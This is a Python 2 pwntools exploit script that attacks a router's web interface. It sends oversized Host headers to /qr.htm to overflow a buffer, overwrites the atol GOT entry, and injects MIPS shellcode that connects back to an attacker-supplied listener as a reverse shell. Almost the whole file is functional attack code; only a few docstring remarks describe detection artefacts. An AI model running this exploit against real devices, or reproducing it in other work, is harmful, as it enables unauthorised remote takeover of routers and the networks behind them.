#! /usr/bin/python2

from pwn import *
import sys
import urllib2
import urllib
import base64

class WebService:
    def __init__(self, ip, port=80):
        self.rooturl = "http://" + ip + ':' + str(port)

    def make_req(self, path, arg=None, host='192.168.0.1', has_ContentLength=False):
#        print "making request"
        headers = {'Host': host}
        if has_ContentLength:
            headers['Content-Length'] = '0'
        if arg is not None:
            parameter = arg
            parameter = urllib.urlencode(parameter)
            fullurl = self.rooturl + path + '?' + parameter
        else:
            fullurl = self.rooturl + path
        req = urllib2.Request(fullurl, None, headers)
        response = urllib2.urlopen(req)
        data = response.read()
        return data


def shellcode(ip):  # port listen : 31337
    """Return the fixed MIPS payload bytes with the listener address *ip* spliced in.

    The byte sequence is constant apart from the two halves of the packed
    address.  *ip* is only checked by ``socket.inet_aton``, which raises
    ``socket.error`` on a malformed dotted quad.
    """
    # Dotted quad -> 32-bit integer -> 4 bytes via pwntools p32, whose byte
    # order follows the pwntools context (the caller sets context.arch='mips').
    ip = p32(int(socket.inet_aton(ip).encode('hex'),16))
    shell = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    shell += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    shell += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    shell += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    shell += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    shell += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    # The two 2-byte halves of the packed address are each reversed and
    # inserted at fixed offsets in the otherwise constant byte sequence.
    shell += "\xf8\xff\xa5\xaf" + ip[:2][::-1] + "\x05\x3c" + ip[2:][::-1] + "\xa5\x34\xfc\xff\xa5\xaf"
    shell += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    shell += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    shell += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    shell += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    shell += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    shell += "\xab\x0f\x02\x24\x0c\x09\x09\x01"
    return shell

def exploit(ip):
    """Send the fixed sequence of GET requests to the hard-coded router address.

    :param ip: dotted-quad listener address passed through to ``shellcode()``.
        It is the only caller-supplied value; the target address is fixed below.

    Observable artefacts (detection): every step is a GET to ``/qr.htm`` whose
    ``Host`` header is over 512 bytes long and carries raw non-ASCII bytes,
    unlike ordinary browser traffic.  Statement order is the protocol here, so
    the steps must not be reordered.
    """
    # Same address as the make_req() default host; the class default is
    # shadowed by passing host= explicitly on every call below.
    target_ip='192.168.0.1'
    w = WebService(target_ip)  # Router IP
    # Only referenced by the commented-out line below.
    l_host_addr = 0x438154 
    atol_got_addr = 0x423780 - 4 
    host_padding = 'a' * 512
    #shellcode_addr = l_host_addr + 0x40
    shellcode_addr = 0x41414141

    print "[+] Sending exploit to ip:%s" % (target_ip)
    host_str = host_padding + 'aaaa' +  p32(shellcode_addr)
    w.make_req('/qr.htm', host=host_str)
    print "[+] Overflowing buffer"
    host_str = host_padding + p32(atol_got_addr)
    w.make_req('/qr.htm', host=host_str)
    print "[+] Overwriting got entry"
    w.make_req('/qr.htm', {'_':'hello'})   # Write

    host_str = 'q'*0x40 + shellcode(ip)
    w.make_req('/qr.htm', host=host_str)
    # Best-effort final request: any failure (connection drop, HTTP error)
    # is deliberately swallowed rather than aborting the run.
    try:
        w.make_req('/qr.htm', has_ContentLength=True)
    except Exception:
        pass
    print "[+] Done!"



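if __name__ == '__main__':
    # Architecture for the pwntools packing helpers (p32) used by
    # shellcode() and exploit(); must be set before either is called.
    context.arch='mips'
    if len(sys.argv) != 2:
        # Substitute the invoked program name into the usage line and exit
        # non-zero so a wrapping shell can detect the argument error.
        print 'Usage: %s <listen ip addr>' % sys.argv[0]
        sys.exit(1)
    exploit(sys.argv[1])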

